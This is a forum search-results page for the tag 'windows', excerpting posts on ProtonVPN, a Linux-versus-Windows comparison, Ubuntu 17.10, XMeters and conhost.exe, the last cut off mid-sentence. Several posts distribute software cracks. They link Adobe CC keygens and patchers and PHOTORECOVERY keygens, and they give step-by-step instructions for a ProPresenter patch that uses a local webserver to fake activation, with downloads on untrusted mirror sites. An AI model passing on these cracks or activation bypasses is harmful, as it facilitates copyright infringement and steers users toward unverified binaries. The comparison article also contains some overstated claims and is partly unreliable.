Welcome to nsane.forums

Welcome to nsane.forums, like most online communities you need to register to view parts of our community or to make contributions, but don't worry: this is a free and simple process that requires minimal information. Be a part of nsane.forums by signing in or creating an account.

  • Access special members only forums
  • Start new topics and reply to others
  • Subscribe to topics and forums to get automatic updates

Search the Community

Showing results for tags 'windows'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Found 1,113 results

  1. Adobe Creative Cloud & Acrobat DC ML [Windows-Mac] Download distributions Adobe CC 2017 ML Direct Download Links: Download Creative Cloud 2017 Apps [Download Links & Instruction ] ** Free Sign-in required** https://helpx.adobe.com/creative-cloud/kb/creative-cloud-apps-download.html ================================= Troubleshoot download and install errors https://helpx.adobe.com/creative-cloud/kb/troubleshoot-download-install-log-files.html Creative Cloud Cleaner Tool to solve installation problems [Windows-Mac] https://helpx.adobe.com/ca/creative-cloud/kb/cc-cleaner-tool-installation-problems.html Adobe CC 2017 ML Direct Download Links: Adobe CCMaker 1.3.3 by El Sanchez - Utility for downloading and or installing products from Adobe Creative Cloud Adobe CC 2015 ML Direct Download Links: Adobe CC 2014 ML Direct Download Links: Products not included in the CC [Captivate 8] Method To Download Adobe CC Adobe CC Useful Utility Tools Adobe CC 2015 Alternative Trials Direct Download Source - Windows Adobe CC 2014 Alternative Trials Direct Download Source - Windows ========================================================================== Product Updates Adobe CC 2015 Product Updates Direct Download Links: Adobe CC 2014 Product Updates Direct Download Links: ADOBE Update Management Tool 8.0 by PainteR WIN | MACOS Adobe Application Manager 9.0 Adobe CC 2014 Alternative Update Direct Download Source - Windows Adobe CC 2014 Alternative Update Direct Download Source - Mac OS ========================================================================== Medicines Windows: Medicine For Adobe Creative Cloud CC 2015 -2017: AMT Emulator v0.9.2 by PainteR [Support Adobe CC 2017] Adobe Universal Patcher v2.0 By Painter'S [Windows] + Instruction [Support Adobe CC 2017] ============================================= Medicine For Adobe Creative Cloud CC 2014 ADOBE CC v2015 XFORCE-KEYGEN Windows + Instruction ADOBE_TECHNICAL_COMMUNICATION_SUITE_V2015_MULTI-XFORCE ADOBE CC v2015 KEYGEN MACOSX XFORCE OR Adobe Universal Patcher v2.0 By Painter'S [Windows] + Instruction OR amtlib 2015 adobe snr patch painter fix By Painter'S ============================================= Windows XP Adobe XP Support Patch [x86] v0.8 By Painter'S - Beta ============================================= Adobe Acrobat DC ADOBE_ACROBAT_PRO_DC_V2015_MULTI-XFORCE -------------------------------------------------------------------------------------------------------------------- MAC OS X: AMT Emulator v0.8.1 for Mac by PainteR [Support Adobe CC 2017] ============================================= Medicine For Adobe Creative Cloud CC 2014 ADOBE CC v2015 XFORCE-KEYGEN [Windows - Mac OS] + Instruction ============================================= Medicine For Adobe Acrobat DC ADOBE_ACROBAT_PRO_DC_V2015_MULTI_MACOSX-XFORCE ============================================= Importand Topic Replies: Run the Adobe CC Cleaner Tool to resolve some Creative Cloud or Creative Suite installation issues. Creative Cloud Cleaner Tool for Mac ==========================================================================
  2. protonvpn

    Proton VPN 1.0.3 Overview: ProtonVPN is designed from the ground up with a special emphasis on security and privacy, and features a number of innovations that we have made to harden VPN against compromises. ProtonVPN will eventually feature free and premium versions containing different features. For the beta period, you will be able to test the full-fledged premium version of ProtonVPN for free. Layers of Protection: Limitation / blocking access to the data / application Isolation and create a separate database / application Backup / important data Detecting and deleting viruses / malware. Proton Mail earlier announced beta VPN service for PLUS proton mail users. At this moment, Proton VPN offers 14 countries Australia Canada France Germany Hong Kong Iceland Japan Netherlands Singapore - New Spain Sweden Switzerland United Kingdom United States Standard Servers All of our servers are dedicated to ProtonVPN and feature high bandwidth connections Secure Core Servers Secure Core Servers add an additional layer of protection against VPN endpoint compromise. Learn More More Info: Official Product Homepage / Detailed Features: https://protonvpn.com/home Official Website: https://protonvpn.com/ Register/Signup: https://account.protonvpn.com/signup Login: https://account.protonvpn.com/login/ Pricing: https://protonvpn.com/pricing VPN Servers: https://protonvpn.com/vpn-servers Security: https://protonvpn.com/secure-vpn VPN Threat Model: https://protonvpn.com/blog/threat-model/ Transparency Report: https://protonvpn.com/blog/transparency-report/ About Us: https://protonvpn.com/about Blog: https://protonvpn.com/blog/ We are open for registration. You can follow ProtonVPN on social media to get the latest news and updates: Facebook: https://facebook.com/ProtonVPN Twitter: https://twitter.com/ProtonVPN Reddit: https://www.reddit.com/r/ProtonVPN/ We would love to hear your feedback on the beta and what we can do to improve ProtonVPN. In addition to the links above, you can also send your suggestions to [email protected] If you run into trouble with ProtonVPN, or have questions, you can search for answers or contact us via the ProtonVPN support site: https://protonvpn.com/support/ Screenshots: Downloads: Download: https://protonvpn.com/download/ Windows Client: https://protonvpn.com/download/ProtonVPN_win_v1.0.3.exe Clients for macOS, Linux, Android, and iOS are still under development, but it is still possible to use ProtonVPN with these operating systems using third-party OpenVPN clients. Setup guides can be found here: MacOS: https://protonvpn.com/support/mac-vpn-setup/ Linux: https://protonvpn.com/support/linux-vpn-setup/ Android: https://protonvpn.com/support/android-vpn-setup/ iOS: https://protonvpn.com/support/ios-vpn-setup/ VPN Servers and Country Code for Linux, Mac, Android and iOS: https://protonvpn.com/support/vpn-servers/ More Info - Articles & Reviews: Three years ago we launched ProtonMail. Today, we’re launching ProtonVPN. Encrypted email provider ProtonMail launches free VPN service to counter increasing online censorship ProtonVPN Swiss-Based VPN Launches
  3. ProtonVPN Swiss-Based VPN Launches ProtonVPN, a VPN service by the makers of the privacy focused ProtonMail email service, is out of beta testing and now available to the public. The creators of the Swiss-based VPN service promise the same level of trust, transparency, and communication that has been fundamental to the success of ProtonMail. ProtonVPN ships with four subscription plans, of which the first is entirely free. It is limited in regards to speed, devices that you may run it on simultaneously, and the number of countries you can connect to. It is not limited in terms of bandwidth however. The first paid plan, ProtonVPN Basic, is available for 4€ per month. It lets you connect to all servers, supports connections on two devices at the same time, and offers high speed. ProtonVPN has three speed tiers right now. Low for free accounts, high for basic accounts, and highest for the Plus and Visionary subscription. The two remaining plans, ProtonVPN Plus and Visionary, for €8 and €24 offer the highest speed, five or ten devices that you may connect from simultaneously, as well as extra features such as Plus servers reserved to these plans, Secure Core which adds extra protection against VPN compromise by routing through the Secure Core Network of ProtonVPN, and Tor Server support to send all traffic through Tor with a single click. The Visionary plan on top of that includes a ProtonMail email account on top of all that. Free users get an option to join a 7 day free trial of ProtonVPN Plus. Secure Core is an interesting option, as it routes traffic through multiple servers before it leaves the ProtonVPN network. This means that anyone monitoring the exit server won't be able to detect the IP address of ProtonVNP users, nor match browser activity to that IP address. Secure servers are located in Switzerland, Iceland and Sweden only. ProtonVPN encrypts all traffic with AES-256, uses 2048-bit RSA key exchange, and HMAC with SHA256 for message authentication. Other security related features that are supported include Forward Secrecy, use of OpenVPN and IKEv2 protocols only, a strict no logging policy, DNS leak prevention, and Kill switch support. ProtonVPN supports P2P traffic on top of that. ProtonVPN comes with clients for Android and iOS, Windows, Linux and Mac. Users of the service may also configure OpenVPN by downloading OpenVPN configuration files. ProtonVPN Windows client The ProtonVPN Windows client installs without issues. You need to supply your account credentials to start using it. It displays the current connection status, and the available locations you can connect to. Once you have established a connection with a click on a country, or one of the available servers, you see additional information in the interface. This includes the connected server, IP address, up and download speed, server load, a world map with information on the server location, and session information. As far as options are concerned: you can enable the VPN Kill Switch in the options, change the default protocol from UDP to TCP, and configure auto connect options. Another interesting feature of the ProtonVNP client for Windows is support for profiles. You can create profiles, and use these profiles to connect to specific servers quickly. This includes, connecting to the fastest available server of a country. Verdict ProtonVPN is one of the best, if not the best free VPN options right now, hands down. Since you are not limited in terms of bandwidth, you can use the free account all day and night long. That's good enough for all web browsing and low speed activities that you can run on your system. You should not expect to get enough bandwidth out of the free plan to stream in 4K or download very large files quickly, but that is to be expected of a free service. It remains to be seen how well the network will handle the onrush of new users who will certainly flock to the service now that it is out of beta and available to the public. ProtonVPN Plus and Visionary seem pricey, especially when compared to services that charge less for a lifetime subscription than ProtonVPN does for six months. Still, the extra privacy and security options are one of the best options that you have when it comes to maximum privacy on the Internet. Now You: Have you tried ProtonVPN? What's your take on the service? Source
  4. Proton VPN 1.0.1 + 1.0.2 Final Overview: ProtonVPN is designed from the ground up with a special emphasis on security and privacy, and features a number of innovations that we have made to harden VPN against compromises. ProtonVPN will eventually feature free and premium versions containing different features. For the beta period, you will be able to test the full-fledged premium version of ProtonVPN for free. Layers of Protection: Limitation / blocking access to the data / application Isolation and create a separate database / application Backup / important data Detecting and deleting viruses / malware. Proton Mail earlier announced beta VPN service for PLUS proton mail users. At this moment, Proton VPN offers 14 countries Australia Canada France Germany Hong Kong Iceland Japan Netherlands Singapore - New Spain Sweden Switzerland United Kingdom United States Standard Servers All of our servers are dedicated to ProtonVPN and feature high bandwidth connections Secure Core Servers Secure Core Servers add an additional layer of protection against VPN endpoint compromise. Learn More More Info: Official Product Homepage / Detailed Features: https://protonvpn.com/home Official Website: https://protonvpn.com/ Register/Signup: https://account.protonvpn.com/signup Login: https://account.protonvpn.com/login/ Pricing: https://protonvpn.com/pricing VPN Servers: https://protonvpn.com/vpn-servers Security: https://protonvpn.com/secure-vpn VPN Threat Model: https://protonvpn.com/blog/threat-model/ Transparency Report: https://protonvpn.com/blog/transparency-report/ About Us: https://protonvpn.com/about Blog: https://protonvpn.com/blog/ We are open for registration. You can follow ProtonVPN on social media to get the latest news and updates: Facebook: https://facebook.com/ProtonVPN Twitter: https://twitter.com/ProtonVPN Reddit: https://www.reddit.com/r/ProtonVPN/ We would love to hear your feedback on the beta and what we can do to improve ProtonVPN. In addition to the links above, you can also send your suggestions to [email protected] If you run into trouble with ProtonVPN, or have questions, you can search for answers or contact us via the ProtonVPN support site: https://protonvpn.com/support/ Screenshots: Downloads: Download: https://protonvpn.com/download/ Windows Client: https://protonvpn.com/download/ProtonVPN_win_v1.0.1.exe Windows Client: https://protonvpn.com/download/ProtonVPN_win_v1.0.2.exe Clients for macOS, Linux, Android, and iOS are still under development, but it is still possible to use ProtonVPN with these operating systems using third-party OpenVPN clients. Setup guides can be found here: MacOS: https://protonvpn.com/support/mac-vpn-setup/ Linux: https://protonvpn.com/support/linux-vpn-setup/ Android: https://protonvpn.com/support/android-vpn-setup/ iOS: https://protonvpn.com/support/ios-vpn-setup/ VPN Servers and Country Code for Linux, Mac, Android and iOS: https://protonvpn.com/support/vpn-servers/ More Info - Articles & Reviews: Three years ago we launched ProtonMail. Today, we’re launching ProtonVPN. Encrypted email provider ProtonMail launches free VPN service to counter increasing online censorship ProtonVPN Swiss-Based VPN Launches
  5. Windows has been my all time favourite operating system for years. No doubt Windows is the most popular operating system available. For all those who want to use their computer systems for basic jobs simply go for Windows. But the developer and geeks who have customised requirements from their operating system try different other operating systems. Another operating system which is also quite popular is Linux. Linux is an open-source and free operating system. People love to work on Linux for many reasons. If we talk about Linux vs Windows, then telling the best one in not that easy as it depends on the need of the user. ve Both Linux and Windows have a lot to offer to their users. So, which operating system you should opt? Difference between Linux and Windows? Are you planning to make a switch between Linux and Windows? In the war, “Linux vs Windows“, here are a few things you need to know. Difference between Linux and Windows You Need to Know Let’s get to know that which operating system is better for you is by comparing Linux and Windows in terms of user interface, security, graphics, gaming and other features. 1. Accessibility of source code: Linux vs Windows This is the first biggest difference between Windows and Linux. Linux provides full access to its source code to the users. Which means you can access the code and even make unlimited changes to it. Each Linux distributions has its not features and working and you can change any of it according to your need. On the other hands, you can never get access to the source code of Windows. So, Windows doesn’t allow its users to look up into its source code. You only get the executable file of the Windows operating system. Well, accessibility to source code has both good and bad points. First of all, if the source code of an operating system is all open to the people out there then those malicious developers or hackers can misuse it or take advantage of weak points of the source code. Also, it is good for those people who want to understand the software completely and want to modify it. Hence, it depends on you which Operating system you like on the basis of accessibility of source code. If you want to have full access to the source code then Linux is for you otherwise Windows is great. Winner: Linux 2. File Structure: Linux vs Windows Another crucial difference between Linux and Windows. The file structure of Linux is far different from that of the Windows. In Windows, you get separate drives like C drive, D drive, the desktop files, the document directory all are the separate ones. Files are displayed in a hierarchical tree structure. But in Linux it is like a single file tree where all the drive and directories are part of the single file. It doesn’t provide you MyDocument or program files, unlike Windows where all such things can be clearly seen and easily understandable. But in Linux, you will need to study all the file structure separately in order to understand it. Winner: Windows 3. Licensing: Linux vs Windows In Linux, there is free of license whereas in Windows it has many restrictions regarding the software’s license and its paid. Linux is a free open-source software which can be edited, modified both commercially and non-commercially under the terms of GNU General public and other respective licenses. You can install it on any number of machines for free. Windows on the other hand is a paid operating system. If you buy 1 license then you can run Windows legally on only 1 machine. If you want to install Windows on five machines then you will have to buy five licenses of Windows operating systems. This is one of the reasons why developers prefer to work on Linux. Winner: Linux 4. Registry: Linux vs Windows If you are a Windows user then you must have heard about Registry and also might have used it for some purpose. Registry saves the low-level settings for Windows and for some applications too which choose to use registry. The regsitry saves a lot of crucial data. It is important in many respects. But In the case of Linux, there is no such feature. Instead, it stores the setting on program-by-program. So, if you alter or change any program’s settings then it will not harm the other programs setting if something goes wrong. So, Linux configuration is modular, unlike Windows. Winner: Linux 5. Hardware support: Linux vs Windows I Found the Windows hardware support better and best than that of the Linux. If you want to install Linux operating system on your system then make sure that every piece of hardware is compatible with Linux as it’s hardware support is not that good. This was the huge problem years ago. Though it has been improved now some still exist. On the other hand, you don’t have to worry about the hardware you want to install Windows on your system as hardware support would not be a problem in this case. You will have to search for the correct driver. Otherwise, each hardware or device you attach to the Windows system, it is assured to make it give it’s 100%. So, Hardware support of Windows is far better than the Linux which makes Windows winner of this section. Winner: Windows 6. Ease of use: Linux vs Windows Windows is the easiest operating system to work on. It’s interface, design, and functionality is really easy for its users. You don’t need to go deeper to understand the operating system. Just install it and start working on your system. So, it’s great for those who just want to do their work on the system. Windows is perfect fit for even those who know very little about technology and gadgets. Even my Grandma uses Windows for some basis tasks like playing a movie or song. Whereas, it is quite difficult to understand Linux in order to work on it. You will have to learn how to do day-to-day function. If there occurs any technical issue then trouble shooting it can become really irritating. You might also find the user interface not so pleasing. Winner: Windows 7. Package manager: Linux vs Windows The best thing about Linux is its Package Manager which enables you to browse, download and install programs directly from it which is quite convenient as you don’t have to search over other browsers to get that particular program. But for Windows, there is no such program and you need to search for the program you want to install in your system you have to go through several steps in order to install it. First of you need to visit the developer’s website, search for the programs, download it and then install the .exe file of the program on your Windows system. Winner: Linux 8. Changes through versions: Linux vs Windows Windows has retained the same basic interface through all its versions. Though in Windows Vista it made some little changes to its interface, but that was almost as same as the previous one. Also, in Windows 8 there came complete new tiled interface which was not liked by many. And now in Windows 10, it is restored to the same one but the transitions and effects are something new in it. That’s not much change to the look of its Interface. But in the case of Linux, you can easily switch to the interface of the operating system without worrying about the re installations etc. as its interface is served from the core system. Also, there are some utilities such as GNOME and KDE etc. which makes it easier. Since, Linux is an open-source operating system it gets a lot of updates and rich features get constantly added to the operating system. Winner: Linux 9. Driver Setting: Linux vs Windows All the popular driver manufacturer companies focus more on the drivers for Windows than that of the Linux due to Windows widespread grasp on drivers. so, finding the best compatible driver for Windows is much easier. You can find and update almost every driver just by visiting the manufacturer’s website, browse the latest update of the driver and update it. But you will get highly irritated to find the latest compatible drivers for your Linux system. Especially for the gaming, as gaming on Linux is not that good as in Windows. Winner: Windows 10. Flexibility: Linux vs Windows Linux is quite more flexible than Windows. As it lets you alter the appearance of it as per your wish. For example, if you want to change the appearance of Desktop of your Linux system then you can easily do that. You can convert it from simple to that mind-blowing 3D Compiz. But in the case of Windows, you have to stuck with that old Microsoft desktop theme. The only thing which you can change it is wallpaper and nothing else. So, Windows is rigid whereas the Linux is really flexible. Winner: Linux 11. Reliability: Linux vs Windows In terms of reliability, Linux leaves behind the Windows. Linux is much reliable than that of Windows. No doubt that Windows have improved much but the sacrifices it makes for making the system more user-friendly it can lead system instability and security vulnerabilities. On the other hand, Linux mainly focuses on system security, process management, and uptime. Winner: Linux 12. Cost: Linux vs Windows Linux, as I said earlier is a free open-source operating system. Although, some companies offer paid support for various distributions but the underlying system software Linux is free of cost. On the other hand, it can cost you from $99 to $199 per licensed copy of Microsoft Windows. Winner: Linux 13. Threats And Security: Linux vs Windows A big difference between Linux and Windows. As compared to Linux, Windows is highly likely to get a victim of viruses and threats. Linux security is quite strong and if chance any threat or virus get into the operating system then it can be easily resolved the developers all around the world. But Windows is the primary target of malicious developers due to which it is more likely to be attacked by the viruses and threats. Windows users keep reporting about virus, adware and malware in their systems however, it is not the case with Linux. Linux is highly secure. Winner: Linux 14. Performance: Linux vs Windows In Windows, it uses a dynamically allocated page file for memory management. On the disk, a page file is allocated for all those objects which are less used and accessed can reside in so that it can leave the enough room for those objects which are actively used. But due to disk fragmentation this scheme suffers slow-down. On the other hand, in Linux there is dedicated partition called swap partition for all the paging operations where all the hard drive installations happen. So, there it is comparatively faster than Windows. There is also huge difference between the file systems of both the OS. In windows, NTFS file system causes file fragmentation due to the way it works. Whereas The file system of Linux doesn’t require any file fragmentation. Also, the visual transition effects and others are very less in Linux so programs load easily. Winner: Linux 15. Customer support: Linux vs Windows Customer support of Microsoft Windows is superior to that of the paid help-desk support of Linux. There are many web forums, websites and hundreds of informative books about Windows where you can find solutions to your problems. For Linux too, there is mass online support available for the same. And you can also buy paid helpdesk support for the Linux. Winner: Windows So, these were some basic but important differences between Linux and Windows. Now it’s up to you to decide which one of these fulfils your requirements. Hope this comparison makes it easier for you to choose between Linux and Windows. Article source
  6. Ubuntu 17.10 to Improve Secure Boot for Booting Windows from GRUB, Enable PIE Ubuntu 17.10 will be supporting the Python 3.6 series The first Alpha builds of Ubuntu 17.10 are almost here, due for release next week on June 29, 2017, for opt-in flavors, so the Ubuntu developers are working around the clock to add various new features, such as PIE (Position Independent Executables) support enabled by default for better security, as well as some other improvements in many areas of interest like Secure Boot. "PIE is now enabled across all architectures by default in Artful. Targeted rebuilds have been done of packages which would break reverse-build-dependencies due to not being compiled with PIE," says Steve Langasek. "The rest of the archive will now pick up PIE support on i386, armhf, and arm64 over the development cycle with rebuilds." PIE support is good news for Ubuntu Linux users as all PIE-enabled binaries will now be automatically loaded into random locations within the virtual memory, along with all of their dependencies, each time the respective applications are being executed. This makes Return Oriented Programming (ROP) attacks harder to execute properly. Netplan to land in Ubuntu Cloud 17.10, Secure Boot improvements Among other noteworthy enhancements that are coming to the Ubuntu 17.10 operating system later this year, we can mention the implementation of Netplan, Canonical's consolidated YAML network configuration across Ubuntu, in the Ubuntu Cloud images. Netplan is also being used by default to configure networks when installing an Ubuntu Server via the Debian Installer. Other than that, there's good news for those who want to boot Ubuntu Linux alongside a Windows OS, as the Ubuntu developers are working on improving Secure Boot chainloading so you'll be able to properly boot Windows from the GRUB bootloader. Some patches were also added so that users will no longer be prompted to disable Secure Boot when using DKMS modules. Lastly, it looks like Ubuntu 17.10 will be supporting the Python 3.6 series, which is now in the artful-proposed repository, and it looks like the transition to Python 3.6 for Artful Aardvark has begun. In related news, the Ubuntu Kernel team recently announced that they are targeting Linux 4.13 as the default kernel for Ubuntu 17.10, due for release on October 19, 2017. Source
  7. Screenshot: Changelog: Patch changed to offline patch only. no online servers for this patch. Links: ProPresenter Homepage: http://www.renewedvision.com/propresenter.php Download Page: http://www.renewedvision.com/pro_download.php Instructions: Download the bundle above, extract using WinRAR or 7zip Install ProPresenter 6 , but DO NOT launch ProPresenter 6 after install. Run Patch as Administrator Run the local webserver by running launch.bat The webserver is required for activation to work Run ProPresenter Updating your ProPresenter to the latest version: Each version will have a separate thread, as it is not encouraged here to edit threads. Modules: Modules are pre-registered with the patch. Use them in the preferences pane. DO NOT CLICK demo modules or buy. Bibles: To Install Bibles: Click the Bibles Icon on the ProPresenter Toolbar Click the GEAR icon on the Bibles Window Click the Bibles Tab Click the Free Bibles Tab Install the bible you need. Local webserver must be running if the Offline Patch is made, otherwise patch the program to download from the web. ProPresenter version 6 for Mac SEE Kataklop's Thread on MacSerialJunkie (google is your friend) He regularly updates as the Mac version also updates. His links are being removed by RenewedVision and maybe mine would be gone too Good luck getting the patch for new versions Blame those guys who post contents of this forum elsewhere.
  8. Proton VPN 1.0.0 Beta/RC Overview: ProtonVPN is designed from the ground up with a special emphasis on security and privacy, and features a number of innovations that we have made to harden VPN against compromises. ProtonVPN will eventually feature free and premium versions containing different features. For the beta period, you will be able to test the full-fledged premium version of ProtonVPN for free. Layers of Protection: Limitation / blocking access to the data / application Isolation and create a separate database / application Backup / important data Detecting and deleting viruses / malware. Proton Mail announced beta VPN service for PLUS proton mail users. At this moment, Proton VPN offers 13 countries with 4/IP Australia Canada France Germany Hong Kong Iceland Japan Netherlands Spain Sweden Switzerland United Kingdom United States More Info: Official Product Homepage / Detailed Features: https://protonvpn.com/home Official Website: https://protonvpn.com/ Register/Signup: https://account.protonvpn.com/signup About Us: https://protonvpn.com/about Blog: https://protonvpn.com/blog/ ProtonVPN is still a work in progress, and we will be releasing more details over the next couple months about what makes ProtonVPN different. You can follow ProtonVPN on social media to get the latest news and updates: Facebook: https://facebook.com/ProtonVPN Twitter: https://twitter.com/ProtonVPN We would love to hear your feedback on the beta and what we can do to improve ProtonVPN. In addition to the links above, you can also send your suggestions to [email protected] If you run into trouble with ProtonVPN, or have questions, you can search for answers or contact us via the ProtonVPN support site: https://protonvpn.com/support/ Screenshots: Downloads: Stability Advisory: This is a "beta/RC" software release which contains known bugs. The stable release date is 20 June 2017. Download: https://protonvpn.com/download/ Windows Client: https://protonvpn.com/download/ProtonVPN_win_v1.0.0.exe Clients for macOS, Linux, Android, and iOS are still under development, but it is still possible to use ProtonVPN with these operating systems using third-party OpenVPN clients. Setup guides can be found here: MacOS: https://protonvpn.com/support/mac-vpn-setup/ Linux: https://protonvpn.com/support/linux-vpn-setup/ Android: https://protonvpn.com/support/android-vpn-setup/ iOS: https://protonvpn.com/support/ios-vpn-setup/ VPN Servers and Country Code for Linux, Mac, Android and iOS: https://protonvpn.com/support/vpn-servers/
  9. Microsoft ISO Downloader Pro is a free program for Windows that allows you to download Windows operating system and Office ISO images from Microsoft servers. Downloading an ISO image of the operating system that is already installed on devices you are working with is always a good idea in case you need to reinstall the operating system or repair it. Microsoft for whatever reason makes it difficult to grab official ISO images of versions of Windows that it supports currently. You have to dig deep to find official and direct download links of Windows and Office ISO images on Microsoft’s website. One of the better solutions is offered on the company’s Techbench website, but it only highlights downloads for Microsoft’s newest operating system Windows 10. Features: Download original Windows 10, 8.1, 7 and Office 2016, 2013, 2010, 2007 ISO directly from Microsoft’s server. Windows Unlock Features (Working in Windows Vista, 7, 8, 8.1, 10) Instructions 1.Select which version you want to 2.Select Edition 3.Select Language 4.Receive download link directly fro Microsoft Server. Enjoy. Whats New : -Added Windows 10 creators update -Fixed Bugs. Download: Site: https://cloud.mail.ru Sharecode: /public/FSSd/a432qJxBV or Site: http://95.141.193.17 Sharecode: /noload2/files/064/rsload.net.M.ISO.Down.Pro.rar Usrname & Pwd: rsload.net Mirror: Site: https://www.multiup.eu/en Sharecode: /download/fffb0e62bf69a4b08102ccce56f3aaa4/M.ISO.Down.Pro.1.7.rar
  10. XMeters is a program for Microsoft Windows devices that displays the resource use of the computer on the Windows taskbar. You have plenty of options when it comes to monitoring the resource use of a Windows PC. From using built-in Windows tools like the Task Manager or Resource Monitor, to third-party solutions like GKrellM, My System Monitor or Rainmeter with its system widgets. XMeters is a bit different, as it adds the information to the system tray area of the Windows taskbar. It is not the first program to do that, Drivegleam or TrayStatus do so as well, but it well designed and displays plenty of hardware readings on the taskbar. XMeters The free version of XMeters may display CPU, memory, storage, and network readings in the system tray area of the Windows operating system. The program is compatible with Windows 7, 8 and 10, and needs to be installed. The installer does not hold any surprises. You are prompted for confirmation on first program start before the hardware information is listed in the taskbar area. The program's configuration window opens as well at that time which you may use to disable some of the readings. If you are only interested in CPU and RAM for instance, then you may disable network and storage. You may configure each of the readings individually as well: CPU -- switch from bars to pie or text, change colors to distinguish between system and user, and select whether to show individual cores, and to separate user and privileged utilization. Storage -- Change colors, and select between displaying aggregate information of all hard drives, or the resource usage of an individual drive. Network -- Change the type from text to bar or pie, change colors, and switch the network interface that you want to monitor. Memory -- Change the type from pie to bar or text, and change colors. The refresh rate slider that you see on the screenshot above is reserved to the professional version of the application. This is the only difference to the free version. The professional version is available for $4.99 on the developer website. XMeters looks like this on the Windows taskbar if you keep all four modules enabled (from left to right: cpu cores, hard drives, network, memory). The benefit of displaying the hardware stats on the taskbar is that they are in sight all the time with the exception when fullscreen apps run on the system. A left-click on any of the modules displayed on the taskbar opens the Windows Task Manager. You cannot terminate the display in the taskbar the usual way though, as it displayed as a toolbar there. So, if you don't want to see the information anymore right-click on the taskbar instead, and uncheck XMeters under toolbars. It is difficult to assess the resources that XMeter requires, as it does not run as a standalone application (XMeters.dll is loaded by Windows Explorer). Verdict XMeters is a handy system monitor for the Windows taskbar that provides you with important real-time hardware readings. It offers customization options to a degree, but could use a couple more (opening another program instead of Task Manager for instance, or colors to distinguish heavy resource use better). Download XMeters: https://entropy6.com/xmeters/ Article source
  11. PHOTORECOVERY 2017 Professional 5.1.5.8 / 5.1.5.9 PHOTORECOVERY recovers “once in a lifetime” moments thought to be lost forever! PHOTORECOVERY® 2017 recovery software is designed to recover digital images, movies and sound files from all types of digital media. It is the #1 data recovery software for Memory Stick™s, SmartMedia, CompactFlash I & II, SD/XD cards, MMC, USB flash drives and most other forms of digital media. Simply attach the media to your computer (a card reader is recommended) and run PHOTORECOVERY® 2017. The pictures are automatically saved off to another location. Features: Homepage: http://www.lc-tech.com/pc/photorecovery/ Requirements: Program Updated: June 05, 2017 Download (Keygen Only) - shared by Om Cracked: Site: http://filescloud.co Sharecode[?]: /9aawjcy4tr6q (Note: To get the activation code in the keygen, copy and paste the URL of the activation page in the keygen.) Installer + Fix: Win - Latest: Site: https://www.mirrorcreator.com Sharecode: /files/14M7YOO6/LC.Technology.PHOTORECOVERY.Professional.5.1.5.9.rar_links Pwd: soft98.ir or Site: https://cloud.mail.ru Sharecode: /public/Gvgp/gZc6i36ij or Site: http://95.141.193.17 Sharecode: /noload2/files/065/rsload.net.HOTORECOVERY.Professional.rar Usrname & Pwd: rsload.net ============================================= Win - v5.1.5.8: Site: https://www.mirrorcreator.com Sharecode: /files/1NFWDDIZ/LC.Technology.PHOTORECOVERY.Professional.5.1.5.8.rar_links Pwd: soft98.ir or Site: https://cloud.mail.ru Sharecode: /public/Dsu2/VXPRVgx9y ============================================= Mac - v5.1.5.2: Site: https://cloud.mail.ru Sharecode: /public/4BEj/U4FS3sav4
  12. You are no doubt reading this article because you’ve stumbled across the Console Window Host (conhost.exe) process in Task Manager and are wondering what it is. We’ve got the answer for you. This article is part of our ongoing series explaining various processes found in Task Manager, like svchost.exe, dwm.exe, ctfmon.exe, mDNSResponder.exe, rundll32.exe, Adobe_Updater.exe, and many others. Don’t know what those services are? Better start reading! So What Is the Console Window Host Process? Understanding the Console Window Host process requires a little bit of history. In the Windows XP days, the Command Prompt was handled by a process named the ClientServer Runtime System Service (CSRSS). As the name implies, CSRSS was a system level service. This created a couple of problems. First, a crash in CSRSS could bring down a whole system, which exposed not just reliability issues, but possible security vulnerabilities as well. The second problem was that CSRSS could not be themed, because the developers didn’t want to risk theme code to run in a system process. So, the Command Prompt always had the classic look rather than using new interface elements. Notice in the screenshot of Windows XP below that the Command Prompt doesn’t get the same styling as an app like Notepad. Windows Vista introduced the Desktop Window Manager—a service that “draws” composite views of windows onto your desktop rather than letting each individual app handle that on its own. The Command Prompt gained some superficial theming from this (like the glassy frame present in other windows), but it came at the expense of being able to drag and drop files, text, and so on into the Command Prompt window. Still, that theming only went so far. If you take a look at the console in Windows Vista, it looks like it uses the same theme as everything else, but you’ll notice that the scrollbars are still using the old style. This is because the Desktop Window Manager handles drawing the title bars and frame, but an old-fashioned CSRSS window still sits inside. Enter Windows 7 and the Console Window Host process. As the name implies, its a host process for the console window. The process sort of sits in the middle between CSRSS and the Command Prompt (cmd.exe), allowing Windows to fix both of the previous issues—interface elements like scrollbars draw correctly, and you can again drag and drop into the Command Prompt. And that’s the method still used in Windows 8 and 10, allowing all the new interface elements and styling that have come along since Windows 7. Even though the Task Manager presents the Console Window Host as a separate entity, it’s still closely associated with CSRSS. If you check the conhost.exe process out in Process Explorer, you can see that it actually runs under the csrss.ese process. In the end, the Console Window Host is something like a shell that maintains the power of running a system-level service like CSRSS, while still securely and reliably granting the ability to integrate modern interface elements. Why Are There Several Instances of the Process Running? You’ll often see several instances of the Console Window Host process running in Task Manager. Each instance of Command Prompt running will spawn its own Console Window Host process. In addition, other apps that make use of the command line will spawn their own Console Windows Host process—even if you don’t see an active window for them. A good example of this is the Plex Media Server app, which runs as a background app and uses the command line to make itself available to other devices on your network. Many background apps work this way, so it’s not uncommon to see multiple instances of the Console Window Host process running at any given time. This is normal behavior. For the most part, each process should take up very little memory (usually under 10 MB) and almost zero CPU unless the process is active. That said, if you notice that a particular instance of Console Window Host—or a related service—is causing trouble, like continual excessive CPU or RAM usage, you could check into the specific apps that are involved. That might at least give you an idea of where to start troubleshooting. Unfortunately, Task Manager itself doesn’t provide good information about this. The good news is that Microsoft provides an excellent advanced tool for working with processes as part of its Sysinternals lineup. Just download Process Explorer and run it—it’s a portable app, so no need to install it. Process Explorer provides all kinds of advanced features—and we highly recommend reading our guide to understanding Process Explorer to learn more. The easiest way to track these processes down in Process Explorer is to first hit Ctrl+F to start a search. Search for “conhost” and then click through the 